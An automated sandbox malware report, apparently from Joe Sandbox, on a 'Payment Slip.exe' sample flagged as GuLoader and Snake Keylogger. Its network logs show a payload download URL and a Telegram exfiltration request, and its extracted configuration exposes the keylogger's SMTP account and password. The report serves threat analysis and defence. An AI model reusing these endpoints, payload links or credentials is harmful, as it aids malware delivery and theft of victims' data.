Windows Analysis Report
Payment Slip.exe

Overview

General Information

Sample name:	Payment Slip.exe
Analysis ID:	1481491
MD5:	db9b31da65d0ef913176d54ceb4cf5f4
SHA1:	5878f8c4e6b82ef6c9d32c020bb9d5898e973e96
SHA256:	893b893178434a4273089c619b1acaefab661c6d647d832a6375fb53e2753669
Tags:	exe
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Initial sample is a PE file and has a suspicious name

Powershell drops PE file

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://smtp.privateemail.com	Avira URL Cloud: Label: malware
Source: http://anotherarmy.dns.army:8081	Avira URL Cloud: Label: malware
Source: http://aborters.duckdns.org:8081	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "amir.brizman@raicoi.com", "Password": "9Lhb3)$OQ.km", "Host": "smtp.privateemail.com", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: Payment Slip.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A986DC CryptUnprotectData,		7_2_04A986DC
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A98EF1 CryptUnprotectData,		7_2_04A98EF1

Uses 32bit PE files

Source: Payment Slip.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2

Source:	Binary string: ation.pdb source: powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2678804410.00000000080E2000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0040276E FindFirstFileW,	7_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_00405770
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0040622B FindFirstFileW,FindClose,	7_2_0040622B

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 0015F2EDh	7_2_0015F150
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 0015F2EDh	7_2_0015F33C
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 0015FAA9h	7_2_0015F804
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A631E8h	7_2_04A62DD0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A62C21h	7_2_04A62970
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6FD21h	7_2_04A6FA78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A60D0Dh	7_2_04A60B30
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A61697h	7_2_04A60B30
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6D1B1h	7_2_04A6CF08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6E769h	7_2_04A6E4C0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6DEB9h	7_2_04A6DC10
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6E311h	7_2_04A6E068
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_04A60040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A631E8h	7_2_04A62DCB
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6F471h	7_2_04A6F1C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A631E8h	7_2_04A63116
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6EBC1h	7_2_04A6E918
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6F019h	7_2_04A6ED70
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6F8C9h	7_2_04A6F620
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6DA61h	7_2_04A6D7B8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A6D609h	7_2_04A6D360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A99280h	7_2_04A98FB0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A97EB5h	7_2_04A97B78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A92151h	7_2_04A91EA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9DF86h	7_2_04A9DCB8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A96733h	7_2_04A96488
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then mov esp, ebp	7_2_04A9AC81
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A90741h	7_2_04A90498
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9F1C6h	7_2_04A9EEF8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A90B99h	7_2_04A908F0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A97571h	7_2_04A972C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9BF96h	7_2_04A9BCC8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A95179h	7_2_04A94ED0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9DAF6h	7_2_04A9D828
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A948C9h	7_2_04A94620
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9BB06h	7_2_04A9B838
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A962D9h	7_2_04A96030
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A932B1h	7_2_04A93008
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9FAE6h	7_2_04A9F818
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A96CC1h	7_2_04A96A18
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9ED36h	7_2_04A9EA68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A93709h	7_2_04A93460
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A94D21h	7_2_04A94A78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9CD46h	7_2_04A9CA78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A97119h	7_2_04A96E70
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A902E9h	7_2_04A90040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A91CF9h	7_2_04A91A50
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9B676h	7_2_04A9B3A8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A91449h	7_2_04A911A0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A92E59h	7_2_04A92BB0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9F656h	7_2_04A9F388
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A95A29h	7_2_04A95780
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9D666h	7_2_04A9D398
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9C8B6h	7_2_04A9C5E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A918A1h	7_2_04A915F8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A95E81h	7_2_04A95BD8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9E8A6h	7_2_04A9E5D8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A955D1h	7_2_04A95328
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A979C9h	7_2_04A97720
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9D1D6h	7_2_04A9CF08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A925A9h	7_2_04A92300
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9B1E6h	7_2_04A9AF18
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9E416h	7_2_04A9E148
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A90FF1h	7_2_04A90D48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A92A01h	7_2_04A92758
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04A9C426h	7_2_04A9C158
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB64E0h	7_2_04AB61E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB5EB7h	7_2_04AB5B48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB3076h	7_2_04AB2DA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABD7A0h	7_2_04ABD4A8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABAC98h	7_2_04ABA9A0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB5986h	7_2_04AB56B8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB94B0h	7_2_04AB91B8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB69A8h	7_2_04AB66B0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB2756h	7_2_04AB2488
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABC480h	7_2_04ABC188
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB154Eh	7_2_04AB1280
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB9978h	7_2_04AB9680
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB5066h	7_2_04AB4D98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB8190h	7_2_04AB7E98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABEF88h	7_2_04ABEC90
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB42B6h	7_2_04AB3FE8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABFDE0h	7_2_04ABFAE8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABD2D8h	7_2_04ABCFE0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB22C6h	7_2_04AB1FF8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABBAF0h	7_2_04ABB7F8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB10BEh	7_2_04AB0DF0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB8FE8h	7_2_04AB8CF0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB3996h	7_2_04AB36C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABEAC0h	7_2_04ABE7C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABBFB8h	7_2_04ABBCC0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABA7D0h	7_2_04ABA4D8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB079Eh	7_2_04AB04D0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB7CC8h	7_2_04AB79D0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB54F6h	7_2_04AB5228
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB8B20h	7_2_04AB8828
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABF918h	7_2_04ABF620
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB3506h	7_2_04AB3238
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABE130h	7_2_04ABDE38
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABB628h	7_2_04ABB330
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB4BD6h	7_2_04AB4908
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB7800h	7_2_04AB7508
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABE5F8h	7_2_04ABE300
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB2BE6h	7_2_04AB2918
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABCE10h	7_2_04ABCB18
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB19B7h	7_2_04AB1710
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABA308h	7_2_04ABA010
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB1E36h	7_2_04AB1B68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABB160h	7_2_04ABAE68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB0C2Eh	7_2_04AB0960
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB8658h	7_2_04AB8360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB4747h	7_2_04AB4478
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB6E70h	7_2_04AB6B78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABDC68h	7_2_04ABD970
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB9E40h	7_2_04AB9B48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB030Eh	7_2_04AB0040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB7338h	7_2_04AB7040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04AB3E26h	7_2_04AB3B58
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABF450h	7_2_04ABF158
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04ABC948h	7_2_04ABC650
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04E01B20h	7_2_04E01828
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04E01190h	7_2_04E00E98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04E00339h	7_2_04E00040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04E00CC8h	7_2_04E009D0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04E01658h	7_2_04E01360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then jmp 04E00800h	7_2_04E00508
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then push 00000000h	7_2_04E854CF
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_04E808DE
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_04E80960
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_04E80D26
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_04E80A10

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49734 -> 66.29.159.53:587

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.5:49734 -> 66.29.159.53:587

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /wp-includes/MGGxuAN14.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-includes/MGGxuAN14.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
